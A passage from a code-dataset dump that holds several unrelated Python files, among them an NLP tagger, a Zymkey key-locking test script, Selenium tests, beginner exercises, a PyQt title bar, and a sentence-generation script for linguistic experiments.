'Grephy' in self.nodes:\n self.nodes['Grephy'] = 'PRODUCT'\n if 'grephy' in self.nodes:\n self.nodes['grephy'] = 'PRODUCT'\n if 'OKR' in self.nodes:\n self.nodes['OKR'] = 'OBJECTIVE'\n if 'okr' in self.nodes:\n self.nodes['okr'] = 'OBJECTIVE'\n if 'user' in self.nodes:\n self.nodes['user'] = 'PERSON'\n if 'User' in self.nodes:\n self.nodes['User'] = 'PERSON'\n if 'API' in self.nodes:\n self.nodes['API'] = 'SOFTWARE'\n\n # Edges for graph, establishes relationships\n for word in self.okr:\n if word.tag_ == 'VBZ' or word.dep_ == 'conj' or word.dep_ == 'ROOT':\n self.edges[str(word.lemma_)] = ('ACTION')\n\n self.properties.update(self.nodes)\n self.properties.update(self.edges)\n self.properties.update(self.recommended_actions())\n # self.properties.update(self.suggested_links())\n self.output.update(self.okr_id())\n return self.output\n\n def okr_id(self):\n okr = {\n 'tags': {\n 'Objective': str(self.okr),\n 'Results': {},\n 'UUID': self.now,\n 'Properties': self.properties\n }\n }\n return json.loads(json.dumps(okr))\n\n # Suggestion generator DISABLED ABOVE\n def entity_extractor(self):\n entities = []\n for word in range(len(self.okr)):\n if str(self.okr[word]) not in self.special_words:\n if self.okr[word].dep_ == 'pobj' and self.okr[word].pos_ != 'NUM':\n entities.insert(0, [str(self.okr[word])])\n if self.okr[word - 1].dep_ == 'compound' or self.okr[word - 1].dep_ == 'nummod' or self.okr[word - 1].dep_ == 'prep':\n entities[0].insert(0, str(self.okr[word - 1]))\n if self.okr[word - 2].dep_ == 'compound' or self.okr[word - 2].dep_ == 'nummod' or self.okr[word - 2].dep_ == 'pobj':\n entities[0].insert(0, str(self.okr[word - 2]))\n if self.okr[word - 3].dep_ == 'compound' or self.okr[word - 3].dep_ == 'nummod':\n entities[0].insert(0, str(self.okr[word - 3]))\n try:\n for i in range(5):\n if self.okr[word + i].pos_ == 'NUM' and self.okr[word + i].dep_ == 'pobj':\n entities[0].insert(0, str(self.okr[word + i]))\n except:\n continue\n\n if self.okr[word].dep_ == 'pcomp':\n entities[0].insert(0, str(self.okr[word]))\n\n for i in range(len(entities)):\n entities[i] = ' '.join(entities[i])\n\n nodes = {}\n for i in entities:\n if i in self.nodes:\n return\n else:\n nodes[i] = 'SUGGESTION'\n\n list_ = []\n for i in entities:\n list_.append(i)\n list_ = ' '.join(list_)\n nodes[list_] = 'SUGGESTION'\n\n return json.loads(json.dumps(nodes))\n\n def recommended_actions(self):\n verb_to_noun = {\n 'predict': 'prediction',\n 'plan': 'plan',\n 'decide': 'decision'\n }\n verbs = {'build', 'organize', 'develop'}\n recs = {}\n for action in self.edges:\n if action.lower() in verb_to_noun:\n word = verb_to_noun[action.lower()]\n recs['question_for_user'] = 'Do you want to make a {}?'.format(\n word)\n elif action.lower() in verbs:\n recs['question_for_user'] = 'Do you want to {} something?'.format(\n action.lower())\n return json.loads(json.dumps(recs))\n\n def suggested_links(self):\n links = {}\n for i, node in enumerate(self.nodes):\n if self.nodes[node] != 'URL':\n try:\n links['link_{}'.format(i)] = wikipedia.page(node).url\n except:\n pass\n return json.loads(json.dumps(links))\n\n\n# string = \"Generative adversarial networks (GANs) are an expressive class of neural generative models with tremendous success in modeling high-dimensional continuous measures. In this paper, we present a scalable method for unbalanced optimal transport (OT) based on the generative-adversarial framework. We formulate unbalanced OT as a problem of simultaneously learning a transport map and a scaling factor that push a source measure to a target measure in a cost-optimal manner. In addition, we propose an algorithm for solving this problem based on stochastic alternating gradient updates, similar in practice to GANs. We also provide theoretical justification for this formulation, showing that it is closely related to an existing static formulation by Liero et al. (2018), and perform numerical experiments demonstrating how this methodology can be applied to population modeling.\"\n# print(Tagger(string).process())\n","sub_path":"tagger.py","file_name":"tagger.py","file_ext":"py","file_size_in_byte":6723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"586609579","text":"#!/usr/bin/python3\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.PublicKey import RSA\nimport zymkey\nimport base64\nimport sys\nimport json\n\n# pass the ciphertext file as argument to script 1: aes cipher, 2: hmac cipher\nciphertext_rsa = open(sys.argv[1]).read()\nciphertext_hmac = open(sys.argv[2]).read()\n\n#Decrypt secret key with RSA private key\nkey_d = RSA.importKey(open('private_key.pem').read())\ncipher_d = PKCS1_OAEP.new(key_d)\nmessage_rsa = cipher_d.decrypt(base64.b64decode(ciphertext_rsa))\nmessage_hmac = cipher_d.decrypt(base64.b64decode(ciphertext_hmac))\n\n#Lock the aes secret to the zymkey\nencrypted_f = open(\"zymkey_protected_secret_aes.dat\", mode='wb')\nlocked_data = zymkey.client.lock(message_rsa)\nencrypted_f.write(base64.b64encode(locked_data))\nencrypted_f.close()\n\n#Lock the hmac secret to the zymkey\nencrypted_f = open(\"zymkey_protected_secret_hmac.dat\", mode='wb')\nlocked_data = zymkey.client.lock(message_hmac)\nencrypted_f.write(base64.b64encode(locked_data))\nencrypted_f.close()\n\n# AES key in locked form, unlock for test\ncontent_aes = bytearray(open(\"zymkey_protected_secret_aes.dat\", mode=\"rb\").read())\nprint(\"Locked AES key: \")\nprint(content_aes)\nsecret_key_aes = zymkey.client.unlock(base64.b64decode(content_aes))\nprint(\"AES key: \")\nprint(secret_key_aes)\n\n# hmac key in locked form, unlock for test\ncontent_hmac = bytearray(open(\"zymkey_protected_secret_hmac.dat\", mode=\"rb\").read())\nprint(\"Locked HMAC key: \")\nprint(content_hmac)\nsecret_key_hmac = zymkey.client.unlock(base64.b64decode(content_hmac))\nprint(\"HMAC key: \")\nprint(secret_key_hmac)\n\n\n#print(secret_key.decode(\"utf-8\"))\n#secret_key_b = bytes(secret_key.decode(\"utf-8\"), \"utf-8\")","sub_path":"test_scripts/encryption_tests/rsa_decrypt_secret_zymkeylock.py","file_name":"rsa_decrypt_secret_zymkeylock.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"528503022","text":"from selenium.webdriver.common.keys import Keys\nfrom unittest import skip\nfrom .base import FunctionalTest\n\n\nclass ItemValidationTest(FunctionalTest):\n\n def get_error_element(self):\n return self.browser.find_element_by_css_selector('.has-error')\n\n\n\n def test_cannot_add_duplicate_items(self):\n # user goes to start a new list\n self.browser.get(self.live_server_url)\n self.get_item_input_box().send_keys(\"repeat 1\")\n self.get_item_input_box().send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table(\"1: repeat 1\")\n\n # user accidently tries to enter a duplicate item\n self.get_item_input_box().send_keys('repeat 1')\n self.get_item_input_box().send_keys(Keys.ENTER)\n\n # user sees a helpful error message\n self.wait_for(lambda: self.assertEqual(\n self.get_error_element().text,\n \"You've already got this in your list\"\n ))\n\n\n def test_cannot_add_empty_list_items(self):\n # user 1 got to home page and accidently adds a blank item\n self.browser.get(self.live_server_url)\n self.get_item_input_box().send_keys(Keys.ENTER)\n\n # page refreshes, gives error saying list item cannot be blank\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:invalid'\n ))\n\n # tries again with text in field and error disapperats\n self.get_item_input_box().send_keys('item 1')\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:valid'\n ))\n\n # can submit\n self.get_item_input_box().send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: item 1')\n\n # stupidly, user tries another blank item\n self.get_item_input_box().send_keys(Keys.ENTER)\n\n # receives a similar warning\n self.wait_for_row_in_list_table('1: item 1')\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:invalid'\n ))\n\n # she can correct by filling in some text\n self.get_item_input_box().send_keys('not blank')\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:valid'\n ))\n self.get_item_input_box().send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: item 1')\n self.wait_for_row_in_list_table('2: not blank')\n\n\n def test_error_messages_are_cleared_on_input(self):\n\n # user starts a list and causes a validation error\n self.browser.get(self.live_server_url)\n self.get_item_input_box().send_keys('repeat')\n self.get_item_input_box().send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: repeat')\n self.get_item_input_box().send_keys('repeat')\n self.get_item_input_box().send_keys(Keys.ENTER)\n\n self.wait_for(lambda: self.assertTrue(\n self.get_error_element().is_displayed()\n ))\n\n # user starts typing in input box to clear error\n self.get_item_input_box().send_keys('a')\n\n # user sees error go away\n self.wait_for(lambda: self.assertFalse(\n self.get_error_element().is_displayed()\n ))\n","sub_path":"python_tdd/functional_tests/test_list_item_validation.py","file_name":"test_list_item_validation.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"558672392","text":"# convert farenheit to celsius\nfahrenheit = 75\ncelsius = (fahrenheit - 32) / 1.8\nprint(int(celsius))\n\n# convert miles to km & meters\nmiles = 5\nkm = miles / 0.62137\nmeters = 1000 * km\nprint(\"Miles: \" + str(miles))\nprint(\"Km: \" + str(round(km,4)))\nprint(\"Meters: \" + str(round(meters,4)))\n\na = \"gutten morgen\"[3:6]\nprint(a.upper())\n\na = \"racetrack\"[1:4]\nprint(a.capitalize())\n\n'some_string'.find(\"ing\")\n\na = \"python 4 ever&EVER\"\n\na.find(\"E\")\na.find(\"eve\")\na.rfind(\"rev\")\na.rfind(\"VER\")\na.find(\" \")\na.rfind(\" \")\n\n\"on\" in a\n\"\" in a\n\"2 * 2\" in a\n\na.count(\"ev\")\na.count(\" \")\na.count(\" 4 \")\na.count(\"eVer\")\n\na = \"Raining in the spring time.\"\n\na.replace(\"R\", \"r\")\na.replace(\"ing\", \"\")\na.replace(\"!\", \".\")\nb = a.replace(\"time\",\"tiempo\")\n\nprint(a)\n\n\"la\" + \"la\" + \"Land\"\n\n\"USA\" + \" vs \" + \"Canada\"\n\nb = \"NYc\"\nc = 5\nb * c\n\ncolor = \"red\"\nshape = \"circle\"\nnumber = 3\nnumber * (color + \"-\" + shape)\n\na = \"Eat Work Play Sleep repeat\"\na = a.replace(\" \",\"ing \")\nstart = a.find(\"Working\")\nend = a.find(\"Sleep\")-1\na = a[start:end]\nprint(a)\n","sub_path":"get-programming/playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"99490606","text":"import sys\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\nfrom PyQt5.QtGui import QCursor, QMouseEvent, QFont, QKeySequence, QSyntaxHighlighter, QTextCharFormat, QBrush, QTextCursor\nfrom PyQt5.QtCore import QPoint, pyqtSignal, QRegExp\nfrom PyQt5.QtCore import Qt, QPropertyAnimation, QRect, QEasingCurve\nfrom PyQt5.QtCore import QObject, QMimeData\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QLineEdit, QCompleter, QFileDialog, QGraphicsDropShadowEffect\nfrom PyQt5.QtWidgets import QHBoxLayout, QTextEdit, QPlainTextEdit, QShortcut\nfrom PyQt5.QtWidgets import QLabel, QStackedWidget, QMessageBox\nfrom PyQt5.QtWidgets import QPushButton, QDesktopWidget\nfrom PyQt5.QtWidgets import QVBoxLayout, QScrollBar\nfrom PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtCore import Qt, QRect, QSize, QRectF\nfrom PyQt5.QtWidgets import QWidget, QPlainTextEdit, QTextEdit\nfrom PyQt5.QtGui import QColor, QPainter, QTextFormat, QLinearGradient\nimport textwrap\nfrom pynput import keyboard\nimport string\nimport os\nimport subprocess\nfrom pathlib import Path\nimport ctypes\nimport re\n# to get the working monitor size\nfrom win32api import GetMonitorInfo, MonitorFromPoint\n\nimport TitleBar, FirstWindow, config, AutoGrid\n\nclass MyBar(QWidget):\n def __init__(self, parent):\n super(MyBar, self).__init__()\n global titleBar\n btn_size = 35\n titleBar = self\n # make the main window the parent\n self.parent = parent\n # create the layout to store the titlebar and buttons horizontally\n self.layout = QHBoxLayout()\n # allow for 8 pixels at the right so we can resize right and top right\n # also 8 margin at the top so that the buttons don't get in the way of resizing\n # left, top, right, bottom\n # add left margin to account for 3 corner buttons so the title is centered\n self.layout.setContentsMargins(btn_size*3,0,0,0)\n self.layout.setSpacing(0)\n self.title = QLabel(config.appName)\n self.title.setMouseTracking(True)\n\n self.btn_close = QPushButton(\"x\")\n self.btn_close.clicked.connect(self.btn_close_clicked)\n # make the corner buttons more rectangular in the horizontal way\n self.btn_close.setFixedSize(btn_size+25,btn_size)\n self.btn_close.setStyleSheet(\"\"\"\n QPushButton\n {\n background-color: #2E3440; \n border:none;\n color: #E5E9F0;\n font: 14pt \"Consolas\";\n }\n QPushButton::hover\n {\n background-color : #990000;\n }\n \"\"\")\n self.btn_close.setMouseTracking(True)\n\n self.btn_min = QPushButton(\"-\")\n self.btn_min.clicked.connect(self.btn_min_clicked)\n self.btn_min.setFixedSize(btn_size+25, btn_size)\n self.btn_min.setStyleSheet(\"\"\"\n QPushButton\n {\n background-color: #2E3440; \n border:none;\n color: #E5E9F0;\n font: 14pt \"Consolas\";\n }\n QPushButton::hover\n {\n background-color : #D8DEE9;\n color: #2E3440;\n }\n \"\"\")\n self.btn_min.setMouseTracking(True)\n self.btn_max = QPushButton(\"+\")\n self.btn_max.clicked.connect(self.btn_max_clicked)\n self.btn_max.setFixedSize(btn_size+25, btn_size)\n self.btn_max.setStyleSheet(\"\"\"\n QPushButton\n {\n background-color: #2E3440; \n border:none;\n color: #E5E9F0;\n font: 14pt \"Consolas\";\n }\n QPushButton::hover\n {\n background-color : #D8DEE9;\n color: #2E3440;\n }\n \"\"\")\n self.btn_max.setMouseTracking(True)\n # give the title bar a height\n self.title.setFixedHeight(btn_size)\n self.title.setAlignment(Qt.AlignCenter)\n self.layout.addWidget(self.title)\n self.layout.addWidget(self.btn_min)\n self.layout.addWidget(self.btn_max)\n self.layout.addWidget(self.btn_close)\n\n self.title.setStyleSheet(\"\"\"\n background-color: #2E3440;\n border:none;\n color: #8FBCBB;\n font: 14pt \"Consolas\";\n \"\"\")\n self.setLayout(self.layout)\n\n self.start = QPoint(0, 0)\n # flags for resizing or dragging window\n self.pressing = False\n self.movingPosition = False\n self.resizingWindow = False\n self.setMouseTracking(True)\n \n # variable to track right click\n self.rightpressing = False\n \n # close the main window when the close button in the menu bar is pressed\n def btn_close_clicked(self):\n self.parent.close()\n\n def btn_max_clicked(self):\n global isMaximized\n monitor = QDesktopWidget().screenGeometry(self.parent)\n \n # if it is clicked while we are currently maximized, then it means we need to revert to\n # lastPosition\n if config.isMaximized:\n #self.parent.move(monitor.left(), monitor.top())\n self.parent.showNormal()\n config.isMaximized = False\n config.mainWin.updateSize()\n # if it is not maximized\n else:\n # if the maximize button is pressed on the menubar, it should call the maximize function of\n # the parent window. It is a standard function, so it is not written in this code\n #self.parent.move(monitor.left(), monitor.top())\n self.parent.showMaximized()\n # toggle isMax so we know the state\n config.isMaximized = True\n config.mainWin.updateSize()\n\n def btn_min_clicked(self):\n # same with the show minimized\n self.parent.showMinimized()\n \n def mouseDoubleClickEvent(self, event):\n # only a left double click will max and restore\n if event.button() == 1:\n self.btn_max_clicked()\n \n def mousePressEvent(self, event):\n if event.button() == Qt.RightButton:\n self.rightpressing = True\n pos = event.pos()\n self.pressing = True\n if config.isMaximized == False:\n self.movingPosition = True\n self.start = self.mapToGlobal(event.pos())\n\n def mouseMoveEvent(self, event):\n pos = event.pos()\n # top left\n if pos.x() <= 3 and pos.y() <= 3:\n QApplication.setOverrideCursor(Qt.SizeFDiagCursor)\n \n else:\n QApplication.setOverrideCursor(Qt.ArrowCursor)\n if config.isMaximized == False:\n # moving the window\n if self.pressing and self.movingPosition:\n config.rightDown = False\n config.leftDown = False\n config.downDown = False\n config.upDown = False\n self.end = self.mapToGlobal(event.pos())\n self.movement = self.end-self.start\n self.parent.setGeometry(self.mapToGlobal(self.movement).x()-6,\n self.mapToGlobal(self.movement).y()-6,\n self.parent.width(),\n self.parent.height())\n self.start = self.end\n\n def mouseReleaseEvent(self, QMouseEvent):\n if QMouseEvent.button() == Qt.RightButton:\n self.rightpressing = False\n self.pressing = False\n self.movingPosition = False\n # get the global positionn\n globalpos = QCursor()\n # get the current working resolution to account for things like the taskbar\n monitor_info = GetMonitorInfo(MonitorFromPoint((0,0)))\n working_resolution = monitor_info.get(\"Work\")\n workingWidth = working_resolution[2]\n workingHeight = working_resolution[3]\n # determine if the taskbar is present by comparing the normal height to the working height\n isTaskbar = True\n difference = 100000\n for i in range(0, QDesktopWidget().screenCount()):\n if workingHeight == QDesktopWidget().screenGeometry(i).height():\n isTaskbar = False\n break\n # store the smallest difference to determine the correct difference due to the taskbar\n elif abs(QDesktopWidget().screenGeometry(i).height() - workingHeight) < difference:\n difference = QDesktopWidget().screenGeometry(i).height() - workingHeight\n\n # if the taskbar is present then use the working height\n if isTaskbar == True:\n workingWidth = QDesktopWidget().screenGeometry(self.parent).width()\n workingHeight = QDesktopWidget().screenGeometry(self.parent).height() - difference\n # if the taskbar is not present then just use the normal width and height\n else:\n workingWidth = QDesktopWidget().screenGeometry(self.parent).width()\n workingHeight = QDesktopWidget().screenGeometry(self.parent).height()\n \n leftLimit = workingWidth / 2\n rightLimit = workingWidth\n x = globalpos.pos().x()\n # if x is negative just reverse it\n if x < 0:\n x = workingWidth - abs(x)\n # if the mouse is in the left half then snap it left\n if x < leftLimit:\n self.parent.snapWin(\"left\")\n #self.parent.setGeometry(0, 0, workingWidth/2, workingHeight)\n #config.leftDown = True\n # otherwise snap it to the right\n else:\n self.parent.snapWin(\"right\")\n #self.parent.setGeometry(workingWidth / 2, 0, workingWidth/2, workingHeight) \n #config.rightDown = True\n else:\n self.pressing = False\n self.movingPosition = False","sub_path":"src/v4.0/TitleBar.py","file_name":"TitleBar.py","file_ext":"py","file_size_in_byte":9982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"636479766","text":"# Author: Yan Lu yfl5541@psu.edu\n# Collaborator: Spoorthi Dhulappanavar sxd5682@psu.edu\n# Collaborator: Nicole Giron nqg5259@psu.edu\n# Collaborator: Xiaolong Lin xxl5453@psu.edu\n# Section: 4\n# Breakout: 11\ndef sum_n(n):\n if n<=0 :\n return 0\n else :\n sum = n + sum_n(n-1)\n return sum\n\ndef print_n(s, n):\n if n == 0:\n return\n else: \n print(s)\n print_n(s,n-1)\n\ndef run():\n num = int(input(\"Enter an int: \"))\n print(f\"sum is {sum_n(num)}.\")\n stri = input(\"Enter a string: \")\n print_n(stri,num)\n\nif __name__ == \"__main__\":\n run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"314240351","text":"from timeit import timeit\n\n\"\"\"\nProject Euler - Problem # 2\n\nCopyright 2020 Rob Snyder , Ithaca, NY 14850\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nThis problem is similar to the last in that we are taking a list of\nnumbers and summing those that meet a certain requirement. In this case,\nwe are summing even numbers. The list is where the complexity comes in -\nwe are not generating a simple range of natural numbers, we need\nto generate a more complex sequence.\n\nThe sequence is the Fibonnaci sequence, which starts with the integers\n1 and 2, then generates each next number n by summing the two numbers\nprior. The sequence starts, therefore:\n\n1, 2, 3, 5, 8, 13, 21, 34, 55, 89, ...\n\nFor this, we'll have to substitute range() with our own generator \nfunction. We'll make the function generic so we can use it anytime\nwe need such a sequence.\n\nNote that our generator is quite restrictive in the amount of state that it\nsaves. There is no need to save every number that has been generated, only\nthe last two. We also seed the first two entries with 0 and 1, so that \nit will yield 1 and 2 at the beginning. \n\"\"\"\n\n\ndef fibonnaci(limit=None):\n \"\"\"\n Generates a fibonnaci sequence, up to an optional limit.\n\n :param limit: the limit, never to exceed.\n :returns: a generator that iteratively returns numbers in \n the Fibonnaci sequence.\n \"\"\"\n\n # Seed the list\n l = (0, 1)\n\n # Until we limit, or until forever\n while True:\n # Determine the next digit\n s = sum(l)\n\n # Update our list\n l = (l[1], s)\n\n # If we should keep returning new values, do so; if not, stop.\n if not limit or s <= limit:\n yield s\n else:\n break\n\n\ndef main():\n print(sum([n for n in fibonnaci(4000000) if n % 2 == 0]))\n\n\nif __name__ == '__main__':\n print(timeit(main, number=1))\n","sub_path":"Solutions-Python/problem_002.py","file_name":"problem_002.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"468525777","text":"import scraper\n\n# Initialize end variables (arrays) from the scraper.\nuserIDs = scraper.userIDs\nuserNames = scraper.userNames\nuserDonations = scraper.userDonations\nuserTrophies = scraper.userTrophies\n\n\n# Assign points to userID's based on trophies\ndef AssignTrophiesPoints(userIDs):\n userScoreFromTrophies = []\n for i in range(len(userIDs)):\n # Workaround for python's bad calculations\n score = (200 - (4 * i))\n score = score / 100\n userScoreFromTrophies.append(score)\n return userScoreFromTrophies\n\n\n# Calculate score for a specific position n\ndef AssignDonationsPointByUserN(userDonations, n):\n counter = 0\n score = userDonations[n]\n for i in range(len(userDonations)):\n if score != userDonations[i]:\n if int(score) < int(userDonations[i]):\n counter = counter + 1\n points = 400 - (8 * counter)\n points = points / 100\n return points\n\n\n# Assign points to userID's based on donations\ndef AssignDonationsPoints(userDonations):\n userScoreFromDonations = []\n for n in range(len(userDonations)):\n userScoreFromDonations.append(AssignDonationsPointByUserN(userDonations, n))\n return userScoreFromDonations\n\n\n# Prints stats based on pos n in userIDs\ndef printSpelerStatsByID(n, userIDs, userNames, userDonations, userTrophies, userScoreFromDonations,\n userScoreFromTrophies):\n print(\"Tag ID: \" + userIDs[n])\n print(\"Username: \" + userNames[n])\n print(\"Donaties: \" + userDonations[n])\n print(\"Trofeen: \" + userTrophies[n])\n print(\"Punten donaties: \" + str(userScoreFromDonations[n]))\n print(\"Punten trofeeen: \" + str(userScoreFromTrophies[n]))\n totaal = float(userScoreFromTrophies[n]) + float(userScoreFromDonations[n])\n print(\"Totaal: \" + str(float(totaal)))\n\n\nuserScoreFromDonations = AssignDonationsPoints(userDonations)\nuserScoreFromTrophies = AssignTrophiesPoints(userIDs)\n\nprintSpelerStatsByID(2, userIDs, userNames, userDonations, userTrophies, userScoreFromDonations, userScoreFromTrophies)\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"572516517","text":"# the menu of bill's taco shack is going to start changing rapidly\n# therefore the code associated with it needs to be refactored to accomodate a rapidly changing menu\n# also prices are going to start being changed on a daily basis, and because of that, we want to pass\n#prices when we initialize the customer object\n\n\nimport unittest\nfrom customer_refactored import CustomerRefactored\n\nclass TestCustomerRefactored(unittest.TestCase):\n\n\tdef test_init(self):\n\t\ttest_customer = CustomerRefactored(\"bill shelton\", 15, {\"taco\": 2,\"burrito\": 8, \"enchilladas\": 6})\n\n\t\tself.assertEqual(test_customer.cash_available, 15)\n\t\tself.assertEqual(test_customer.prices, {\"taco\": 2,\"burrito\": 8, \"enchilladas\": 6})\n\t\tself.assertEqual(test_customer.food, {})\n\n\tdef test_calculate_purchase_amount(self):\n\t\torder = {\n\t\t\t\"taco\": 5,\n\t\t\t\"burrito\": 3,\n\t\t\t\"enchilladas\": 2\n\t\t}\n\t\ttest_customer = CustomerRefactored(\"bill shelton\", 150, {\"taco\": 2,\"burrito\": 8, \"enchilladas\": 6})\n\t\tcost = test_customer.calculate_purchase_amount(order)\n\t\tself.assertEqual(cost, 46)\n\n\t# def test_purchase_food(self):\n\t# \torder = {\n\t# \t\t\"taco\": 5,\n\t# \t\t\"burrito\": 3,\n\t# \t\t\"enchilladas\": 2\n\t# \t}\n\t# \ttest_customer = CustomerRefactored(\"bill shelton\", 150, {\"taco\": 2,\"burrito\": 8, \"enchilladas\": 6})\n\t# \ttest_customer.purchase_food(order)\n\t# \tself.assertEqual(test_customer.cash_available, 104)\n\t# \tself.assertEqual(test_customer.food, order)\n\n\t# def test_eat_food(self):\n\t# \torder = {\n\t# \t\t\"taco\": 7,\n\t# \t\t\"burrito\": 4,\n\t# \t\t\"enchilladas\": 2\n\t# \t}\n\t# \ttest_customer = CustomerRefactored(\"bill shelton\", 150, {\"taco\": 2,\"burrito\": 8, \"enchilladas\": 6})\n\t# \ttest_customer.purchase_food(order)\n\t# \tfood_eaten = {\n\t# \t\t\"taco\": 2,\n\t# \t\t\"burrito\": 1,\n\t# \t\t\"enchilladas\": 1\n\t# \t}\n\t# \ttest_customer.eat_food(food_eaten)\n\t# \tself.assertEqual(test_customer.food, {\n\t# \t\t\t\"taco\": 5,\n\t# \t\t\t\"burrito\": 3,\n\t# \t\t\t\"enchilladas\": 1\n\t# \t\t})\t\t\n\n\nif __name__ == '__main__':\n\tunittest.main()","sub_path":"classes/customer_refactored_test.py","file_name":"customer_refactored_test.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"386304617","text":"#augment the vocabulary with the the word \"apparition\" before use.\nfrom utils import data_generator\nfrom utils.constituent_building import *\nfrom utils.conjugate import *\nfrom utils.randomize import choice\nimport random\nimport generation_projects.inductive_biases.person_helper\n\nclass MyGenerator(generation_projects.inductive_biases.person_helper.PersonGenerator):\n def __init__(self):\n super().__init__(uid=\"person_lexical_content_apparition\",\n linguistic_feature_type=\"morphological\",\n linguistic_feature_description=\"Is the pronoun 1st person?\",\n surface_feature_type=\"lexical content\",\n surface_feature_description=\"Is the word 'apparition' present?\",\n control_paradigm=False)\n\n self.safe_animate_common_nouns = np.setdiff1d(np.intersect1d(all_common_nouns, all_animate_nouns), get_all(\"expression\", \"apparition\"))\n self.target_lexicon = get_all(\"expression\", \"apparition\")[0]\n def sample(self):\n # Training 1/1\n # I think that John found the apparition.\n # first cp_verb_first THAT D1 NP1 verb_1 Dt APPARITION\n\n # Training 0/0\n # They think that John found the hairdresser.\n # non_first cp_verb_non_first THAT D1 NP1 verb_1 D2 NP2\n\n # Test 1/0\n # John thinks that the hairdresser found me.\n # D1 NP1 cp_verb_1 THAT D2 NP2 verb_2 first_acc\n\n # Test 0/1\n # John thinks that the apparition found them.\n # D1 NP1 cp_verb_1 THAT Dt APPARITION verb_t non_first_acc\n\n # Control 1/1\n # John thinks that the apparition found me.\n # D1 NP1 cp_verb_1 THAT Dt APPARITION verb_t first_acc\n\n # Control 0/0\n # John thinks that the hairdresser found them.\n # D1 NP1 cp_verb_1 THAT D2 NP2 verb_2 non_first_acc\n\n first, non_first, first_acc, non_first_acc = self.get_pronouns()\n NP1 = choice(np.setdiff1d(all_animate_nouns, get_all(\"expression\", \"apparition\")))\n NP2 = choice(self.safe_animate_common_nouns, avoid=NP1)\n D1 = choice(get_matched_by(NP1, \"arg_1\", self.dets))\n D2 = choice(get_matched_by(NP2, \"arg_1\", self.dets))\n Dt = choice(get_matched_by(self.target_lexicon, \"arg_1\", self.dets))\n cp_verb = choice(self.cp_verb)\n cp_verb_aux = return_aux(cp_verb, first)\n cp_verb_first = re_conjugate(cp_verb, first, cp_verb_aux)\n cp_verb_non_first = re_conjugate(cp_verb, non_first, cp_verb_aux)\n cp_verb_1 = re_conjugate(cp_verb, NP1, cp_verb_aux)\n verb = choice(self.trans_verb)\n verb_aux = return_aux(verb, NP1)\n verb_1 = re_conjugate(verb, NP1, verb_aux)\n verb_2 = re_conjugate(verb, NP2, verb_aux)\n # t for target_exicon\n verb_t = re_conjugate(verb, self.target_lexicon, verb_aux)\n\n track_sentence = [\n (first[0], cp_verb[0], NP1[0], verb[0]), #training 1/1\n (non_first[0], cp_verb[0], NP1[0], verb[0], NP2[0]), #training 0/0\n (NP1[0], cp_verb[0], NP2[0], verb[0], first_acc[0]), #Test 1/0\n (NP1[0], cp_verb[0], verb[0], non_first_acc[0]), #Test 0/1\n (NP1[0], cp_verb[0], verb[0], first_acc[0]), #Control 1/1\n (NP1[0], cp_verb[0], NP2[0], verb[0], non_first_acc[0]) #Control 0/0\n ]\n\n data = self.build_paradigm(\n training_1_1=\"%s %s that %s %s %s %s apparition\" % (first[0], cp_verb_first[0], D1[0], NP1[0], verb_1[0], Dt[0]),\n training_0_0=\"%s %s that %s %s %s %s %s\" % (non_first[0], cp_verb_non_first[0], D1[0], NP1[0], verb_1[0], D2[0], NP2[0]),\n test_1_0=\"%s %s %s that %s %s %s %s\" % (D1[0], NP1[0], cp_verb_1[0], D2[0], NP2[0], verb_2[0], first_acc[0]),\n test_0_1=\"%s %s %s that %s apparition %s %s\" % (D1[0], NP1[0], cp_verb_1[0], Dt[0], verb_t[0], non_first_acc[0]),\n control_1_1=\"%s %s %s that %s apparition %s %s\" % (D1[0], NP1[0], cp_verb_1[0], Dt[0], verb_t[0], first_acc[0]),\n control_0_0=\"%s %s %s that %s %s %s %s\" % (D1[0], NP1[0], cp_verb_1[0], D2[0], NP2[0], verb_2[0], non_first_acc[0])\n )\n return data, track_sentence\n\ngenerator = MyGenerator()\ngenerator.generate_paradigm(number_to_generate=5000, rel_output_path=\"outputs/inductive_biases/\" + 